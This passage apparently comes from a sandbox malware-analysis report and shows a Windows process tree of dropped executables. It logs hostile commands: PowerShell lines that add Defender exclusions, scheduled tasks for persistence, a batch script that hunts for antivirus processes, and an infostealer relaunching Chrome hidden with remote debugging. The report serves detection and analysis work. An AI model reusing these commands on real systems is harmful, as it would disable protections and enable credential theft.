- System Location Discovery: System Language Discovery
PID:3776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4664
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1520
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\logon.exe"C:\Users\Admin\AppData\Local\Temp\Files\logon.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe"C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"3⤵
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat4⤵PID:1884
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:3096
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5786785⤵
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PEACEFOLKSEXUALISLANDS" Hill5⤵PID:1360
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y5⤵
- System Location Discovery: System Language Discovery
PID:4660
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pifCooper.pif y5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3804
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:2304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\anubis.exe"C:\Users\Admin\AppData\Local\Temp\Files\anubis.exe"3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4252 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /Query /TN "anubis"4⤵PID:5716
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "anubis" /tr "C:\Users\Admin\AppData\Local\Temp\Files\anubis.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hs.exe"C:\Users\Admin\AppData\Local\Temp\Files\hs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe"C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6228 -
C:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdate.exeC:\Windows\SystemTemp\GUMDAAC.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:6532 -
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:7128
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:7164 -
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1524
-
-
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4720
-
-
C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:972
-
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUNGM0Y3MDItNDQ3Mi00QkRFLThFOEItRDk3QkZFOTZCMzJEfSIgdXNlcmlkPSJ7ODgzOTVERTQtOEYzNi00RTE3LTk1MTQtRkRFNTE4MEY5NTg1fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezhGQUM4MkQ3LTJBNUYtNEUyNS1CRTg5LUZDNDE5QTA5ODJCNX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins0MzBGRDREMC1CNzI5LTRGNjEtQUEzNC05MTUyNjQ4MTc5OUR9IiB2ZXJzaW9uPSIxLjMuMzYuMzcxIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjM1MiIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpaWQ9IntEQjI0RUREMy05OTIwLTVENUYtRkJCRS04RTc0M0Y3NDg2QzF9Ij48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBpbnN0YWxsX3RpbWVfbXM9IjQ2MSIvPjwvYXBwPjwvcmVxdWVzdD45⤵
- Executes dropped EXE
- Loads dropped DLL
- System Network Configuration Discovery: Internet Connection Discovery
PID:6220
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{1CF3F702-4472-4BDE-8E8B-D97BFE96B32D}"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\intro.avi.exe"C:\Users\Admin\AppData\Local\Temp\Files\intro.avi.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6516 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\intro.avi.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6692
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6760 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:5652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wa8cd7rM8p3v.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5340 -
C:\Windows\SysWOW64\chcp.comchcp 650016⤵PID:6312
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6408
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:6264 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dLuBaVPhe5TW.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:6424 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:5460
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7064
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6132 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2aDmiAt9JFCG.bat" "9⤵PID:5076
-
C:\Windows\SysWOW64\chcp.comchcp 6500110⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost10⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2152
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"10⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3468 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f11⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r0RvzuuPr3Xo.bat" "11⤵PID:3104
-
C:\Windows\SysWOW64\chcp.comchcp 6500112⤵PID:6288
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost12⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:772
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"12⤵PID:5016
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:7884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BF17YymjHX4w.bat" "13⤵PID:8052
-
C:\Windows\SysWOW64\chcp.comchcp 6500114⤵PID:8100
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8144
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"14⤵PID:7868
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:1640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\z8aLoAFl1VbV.bat" "15⤵PID:4708
-
C:\Windows\SysWOW64\chcp.comchcp 6500116⤵PID:7508
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7956
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"16⤵PID:8592
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uxlMxgGltGfC.bat" "17⤵PID:9292
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵PID:928
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9800
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"18⤵PID:7056
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:6860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XhOoOoOLKrBT.bat" "19⤵PID:9656
-
C:\Windows\SysWOW64\chcp.comchcp 6500120⤵PID:9728
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9448
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"20⤵PID:7172
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:10152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qnU1H19TwK3Y.bat" "21⤵PID:8376
-
C:\Windows\SysWOW64\chcp.comchcp 6500122⤵PID:7232
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7336
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"22⤵PID:7204
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:9036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r1SPFALpokzt.bat" "23⤵PID:9284
-
C:\Windows\SysWOW64\chcp.comchcp 6500124⤵PID:7552
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:872
-
-
C:\Users\Admin\AppData\Roaming\system\systemware.exe"C:\Users\Admin\AppData\Roaming\system\systemware.exe"24⤵PID:6184
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "System Ware" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\system\systemware.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:4856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DhXH0ubzoCvj.bat" "25⤵PID:7504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 174825⤵
- Program crash
PID:3932
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 175623⤵
- Program crash
PID:7976
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7172 -s 168421⤵
- Program crash
PID:7376
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 203219⤵
- Program crash
PID:10228
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 226017⤵
- Program crash
PID:9956
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 202015⤵
- Program crash
PID:2676
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 205213⤵
- Program crash
PID:5824
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 226811⤵
- Program crash
PID:4696
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 20089⤵
- Program crash
PID:4620
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 17647⤵
- Program crash
PID:6276
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 20445⤵
- Program crash
PID:6300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\06082025.exe"C:\Users\Admin\AppData\Local\Temp\Files\06082025.exe"3⤵PID:7068
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:7156 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5248
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"3⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\steal_stub.exe"4⤵PID:8372
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:7492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:10160 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0x50,0x104,0x7ffa799efd08,0x7ffa799efd14,0x7ffa799efd206⤵PID:10176
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:9596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:9824 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa799efd08,0x7ffa799efd14,0x7ffa799efd206⤵PID:9752
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:5484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:9736 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa799efd08,0x7ffa799efd14,0x7ffa799efd206⤵PID:9688
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:9592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
PID:9320 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa80e3fd08,0x7ffa80e3fd14,0x7ffa80e3fd206⤵PID:9556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1960,i,10036548141638847266,7960079924346170776,262144 --variations-seed-version --mojo-platform-channel-handle=1956 /prefetch:26⤵PID:8584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations=is-enterprise-managed=no --field-trial-handle=1748,i,10036548141638847266,7960079924346170776,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:116⤵PID:9240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations=is-enterprise-managed=no --field-trial-handle=2068,i,10036548141638847266,7960079924346170776,262144 --variations-seed-version --mojo-platform-channel-handle=2976 /prefetch:136⤵PID:9292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2808,i,10036548141638847266,7960079924346170776,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:16⤵
- Uses browser remote debugging
PID:2924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2816,i,10036548141638847266,7960079924346170776,262144 --variations-seed-version --mojo-platform-channel-handle=3164 /prefetch:16⤵
- Uses browser remote debugging
PID:7764
-
-
